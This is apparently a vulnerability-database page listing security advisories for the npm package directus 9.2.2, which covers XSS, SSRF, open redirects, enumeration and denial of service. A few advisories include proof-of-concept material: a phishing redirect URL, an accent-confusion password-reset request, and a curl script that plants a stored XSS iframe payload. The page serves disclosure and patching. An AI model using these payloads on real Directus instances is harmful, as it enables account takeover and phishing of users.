Search for packages
| purl | pkg:npm/directus@9.2.2 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-1hn2-pjm6-dyhj
Aliases: CVE-2022-26969 GHSA-g27j-74fp-xfpr GMS-2022-677 |
Duplicate This advisory duplicates another. |
Affected by 40 other vulnerabilities. |
|
VCID-3cgw-zr3k-3fen
Aliases: CVE-2024-28238 GHSA-2ccr-g2rv-h677 |
Session Token in URL in directus ### Impact When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user. ### Patches _Has the problem been patched? What versions should users upgrade to?_ ### Workarounds There's no workaround available. ### References _Are there any links users can visit to find out more?_ |
Affected by 38 other vulnerabilities. |
|
VCID-3kmj-b584-9ubg
Aliases: CVE-2026-35412 GHSA-qqmv-5p3g-px89 |
Affected by 6 other vulnerabilities. |
|
|
VCID-5qx9-76s2-6qfw
Aliases: CVE-2026-35442 GHSA-38hg-ww64-rrwc |
Affected by 0 other vulnerabilities. |
|
|
VCID-7zt3-dcnm-hqfb
Aliases: CVE-2025-64746 GHSA-9x5g-62gj-wqf2 |
Directus has Improper Permission Handling on Deleted Fields Directus does not properly clean up field-level permissions when a field is deleted. If a new field with the same name is created later, the system automatically re-applies the old permissions, which can lead to unauthorized access. |
Affected by 13 other vulnerabilities. |
|
VCID-8r4e-a1vf-9bd9
Aliases: CVE-2024-28239 GHSA-fr3w-2p22-6w7p |
URL Redirection to Untrusted Site in OAuth2/OpenID in directus ### Summary The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL https://docs.directus.io/reference/authentication.html#login-using-sso-providers /auth/login/google?redirect for example. ### Details There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`, which I think is here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L394. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like a an error message "Your password needs to be updated" to phish out the current password. ### PoC Turn on any auth provider in Directus instance. Form a link to `directus-instance/auth/login/:provider_id?redirect=http://malicious-fishing-site.com`, login and get taken to malicious-site. Tested on the `ory` OAuth2 integration. ### Impact Users who login via OAuth2 into Directus. |
Affected by 38 other vulnerabilities. |
|
VCID-9gba-zszk-p3h6
Aliases: CVE-2022-36031 GHSA-77qm-wvqq-fg79 |
Affected by 41 other vulnerabilities. |
|
|
VCID-anfb-6kfn-a7h7
Aliases: CVE-2026-26185 GHSA-jr94-gj3h-c8rf |
Directus Vulnerable to User Enumeration via Password Reset Timing Attack A timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. |
Affected by 11 other vulnerabilities. |
|
VCID-axx3-a6te-d3cw
Aliases: GHSA-6q22-g298-grjh |
Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver ## Summary The GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver. The health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections. ## Fix A request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. This eliminates the amplification factor regardless of how many aliases an attacker includes in a query. ## Impact - **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users - **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O - **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server - **No authentication required:** Any network-accessible attacker can trigger this condition - **Single-request impact:** A single request is sufficient to cause significant resource consumption ## Credit This vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai). |
Affected by 0 other vulnerabilities. |
|
VCID-bh2g-b9dd-d3d9
Aliases: CVE-2025-53886 GHSA-f24x-rm6g-3w5v |
Affected by 18 other vulnerabilities. |
|
|
VCID-eb8p-vqjt-yfb8
Aliases: CVE-2024-34708 GHSA-p8v3-m643-4xqx |
Affected by 36 other vulnerabilities. |
|
|
VCID-ejme-tqn4-byhk
Aliases: CVE-2024-27296 GHSA-5mhg-wv8w-p59j |
Directus version number disclosure ### Impact Currently the exact Directus version number is being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. ### Patches The problem has been resolved in versions 10.8.3 and newer ### Workarounds None |
Affected by 37 other vulnerabilities. |
|
VCID-et4m-8y15-9fb9
Aliases: CVE-2023-27481 GHSA-m5q3-8wgf-x8xf |
Exposure of Sensitive Information to an Unauthorized Actor Directus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`. |
Affected by 40 other vulnerabilities. |
|
VCID-eygf-cb4y-hqd3
Aliases: CVE-2023-28443 GHSA-8vg2-wf3q-mwv7 |
Insertion of Sensitive Information into Log File Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. This issue is patched in version 9.23.3. |
Affected by 40 other vulnerabilities. |
|
VCID-g34r-4mb9-afab
Aliases: CVE-2025-30352 GHSA-7wq3-jr35-275c |
Affected by 22 other vulnerabilities. |
|
|
VCID-gjju-tu4e-gqfc
Aliases: CVE-2024-27295 GHSA-qw9g-7549-7wg5 |
Directus has MySQL accent insensitive email matching ## Password reset vulnerable to accent confusion The password reset mechanism of the Directus backend is implemented in a way where combined with (specific, need to double check if i can work around) configuration in MySQL or MariaDB. As such, it allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insenstive and case-insensitve comparisons. MySQL weak comparison: ```sql select 1 from directus_users where 'julian@cure53.de' = 'julian@cüre53.de'; ``` This is exploitable due to an error in the API using the supplied email address for sending the reset password mail instead of using the email from the database. ### Steps to reproduce: 1. If the attacker knows the email address of the victim user, i.e., `julian@cure53.de`. (possibly just the domain could be enough for an educated guess) 2. A off-by-one accented domain `cüre53.de` can be registered to be able to receive emails. 3. With this email the attacker can request a password reset for `julian@cüre53.de`. ```http POST /auth/password/request HTTP/1.1 Host: example.com [...] {"email":"julian@cüre53.de"} ``` 4. The supplied email (julian@cüre53.de) gets checked against the database and will match the non-accented email `julian@cure53.de` and will continue to email the password reset link to the provided email address instead of the saved email address. 5. With this email the attacker can log into the target account and use it for nefarious things ### Workarounds Should be possible with collations but haven't been able to confirm this. ### References - https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation/ - https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html |
Affected by 37 other vulnerabilities. |
|
VCID-gpfk-nsnr-4khn
Aliases: CVE-2022-23080 GHSA-5h75-pvq4-82c9 |
Affected by 40 other vulnerabilities. |
|
|
VCID-gwwu-p9jt-eke3
Aliases: CVE-2026-35413 GHSA-wxwm-3fxv-mrvx |
Affected by 6 other vulnerabilities. |
|
|
VCID-hed8-anm5-ukc9
Aliases: CVE-2026-22032 GHSA-3573-4c68-g8cc |
Directus has open redirect in SAML An open redirect vulnerability exists in the Directus SAML authentication callback endpoint. The `RelayState` parameter is used in redirects without proper validation against an allowlist of permitted domains. |
Affected by 12 other vulnerabilities. |
|
VCID-hpbn-rr29-2yck
Aliases: CVE-2025-53885 GHSA-x3vm-88hf-gpxp |
Affected by 18 other vulnerabilities. |
|
|
VCID-hrqc-8err-4fbx
Aliases: GHSA-22rr-f3p8-5gf8 GMS-2023-2358 |
Directus affected by VM2 sandbox escape vulnerability ### Impact In vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the "Run Script" operation in flows being able to escape the sandbox running code in the main nodejs context. ### Patches Patched in v10.6.0 by replacing `vm2` with `isolated-vm` ### Workarounds None ### References https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 |
Affected by 39 other vulnerabilities. |
|
VCID-jjth-fmsp-rfcj
Aliases: CVE-2025-64747 GHSA-vv2v-pw69-8crf |
Directus is Vulnerable to Stored Cross-site Scripting A stored cross-site scripting (XSS) vulnerability exists that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution. |
Affected by 13 other vulnerabilities. |
|
VCID-kqs7-8txh-jyc8
Aliases: CVE-2024-6534 GHSA-3fff-gqw3-vj86 |
Affected by 32 other vulnerabilities. |
|
|
VCID-m3wb-sstx-v3d6
Aliases: CVE-2025-24353 GHSA-pmf4-v838-29hg |
Affected by 30 other vulnerabilities. |
|
|
VCID-mp82-hx9n-dufy
Aliases: CVE-2026-35408 GHSA-8m32-p958-jg99 |
Affected by 0 other vulnerabilities. |
|
|
VCID-msb5-197k-a3er
Aliases: CVE-2024-46990 GHSA-68g8-c275-xf2m |
Affected by 0 other vulnerabilities. Affected by 31 other vulnerabilities. Affected by 32 other vulnerabilities. |
|
|
VCID-na3v-me78-aqcg
Aliases: CVE-2025-64749 GHSA-cph6-524f-3hgr |
Directus Vulnerable to Information Leakage in Existing Collections An observable difference in error messaging was found in the Directus REST API. The `/items/{collection}` API returns different error messages for these two cases: 1. A user tries to access an existing collection which they are not authorized to access. 2. A user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. |
Affected by 13 other vulnerabilities. |
|
VCID-nvha-b5tb-dqdt
Aliases: CVE-2025-64748 GHSA-8jpw-gpr4-8cmh |
Directus's conceal fields are searchable if read permissions enabled A vulnerability allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. |
Affected by 13 other vulnerabilities. |
|
VCID-p1m5-v3rs-wbh7
Aliases: CVE-2026-35409 GHSA-wv3h-5fx7-966h |
Affected by 10 other vulnerabilities. |
|
|
VCID-p7d9-91j7-dbab
Aliases: CVE-2022-24814 GHSA-xmjj-3c76-5w84 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to a file uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ "media_live_embeds": false }` to the _Options Overrides_ option of the Rich Text HTML interface. |
Affected by 40 other vulnerabilities. |
|
VCID-prpm-x77m-cuha
Aliases: CVE-2026-35441 GHSA-ph52-67fq-75wj |
Affected by 0 other vulnerabilities. |
|
|
VCID-pwt9-krmn-7kdd
Aliases: CVE-2025-53889 GHSA-7cvf-pxgp-42fc |
Affected by 18 other vulnerabilities. |
|
|
VCID-szny-2sbf-v7de
Aliases: CVE-2023-26492 GHSA-j3rg-3rgm-537h |
Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0. |
Affected by 1 other vulnerability. Affected by 41 other vulnerabilities. |
|
VCID-tt5x-yjzf-4yab
Aliases: CVE-2026-35411 GHSA-q75c-4gmv-mg9x |
Affected by 6 other vulnerabilities. |
|
|
VCID-ukzv-q5tj-4faq
Aliases: CVE-2026-39943 GHSA-mvv8-v4jj-g47j |
Affected by 0 other vulnerabilities. |
|
|
VCID-v4vz-smcx-gygb
Aliases: CVE-2023-27474 GHSA-4hmq-ggrm-qfc6 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Directus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL is vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users urls to the servers domain but which may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset url from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround. |
Affected by 1 other vulnerability. Affected by 41 other vulnerabilities. |
|
VCID-wgag-36wa-qyay
Aliases: GHSA-9qrm-48qf-r2rw |
Directus has a DOM-Based cross-site scripting (XSS) via layout_options ### Impact Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover. ### PoC To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account. 1. Upload the following JavaScript file. Using the upload functionality at `POST /files`. This PoC will show an alert message. ```js export TARGET_HOST="http://localhost:8055" export ATTACKER_EMAIL="malicious@malicious.com" export ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" id_url_file=$(echo "alert('Successful DOM-based XSS')" | curl -s -k -X 'POST' "${TARGET_HOST}/files" \ -b "${root_dir}/static/attacker_directus_session_token" \ -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id") ``` 2. Create a preset for a collection and store the preset ID. Or use a preset already created from GET /presets. The following example uses the direct_users preset. ``` attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}" ``` When the user visits the view that uses the directus_users preset, the JavaScript file will be executed. Notes: Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`. We can target any collection that uses the vulnerable template structure that renders the layout option section. In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover. |
Affected by 27 other vulnerabilities. |
|
VCID-wn2j-dtpz-hye1
Aliases: CVE-2025-53887 GHSA-rmjh-cf9q-pv7q |
Affected by 18 other vulnerabilities. |
|
|
VCID-xt9c-32g5-mqes
Aliases: CVE-2024-45596 GHSA-cff8-x7jv-4fm8 |
Affected by 0 other vulnerabilities. Affected by 32 other vulnerabilities. |
|
|
VCID-xtcw-1jv1-s7ax
Aliases: CVE-2026-35410 GHSA-cf45-hxwj-4cfj |
Affected by 6 other vulnerabilities. |
|
|
VCID-y1vf-15p4-rfca
Aliases: CVE-2026-39942 GHSA-393c-p46r-7c95 |
Affected by 0 other vulnerabilities. |
|
|
VCID-yutw-33sk-5fg3
Aliases: GHSA-q83v-hq3j-4pq3 |
Duplicate Advisory: Improper access control in Directus |
Affected by 33 other vulnerabilities. |
|
VCID-yz34-qwam-wbcn
Aliases: CVE-2024-36128 GHSA-632p-p495-25m5 |
Affected by 35 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||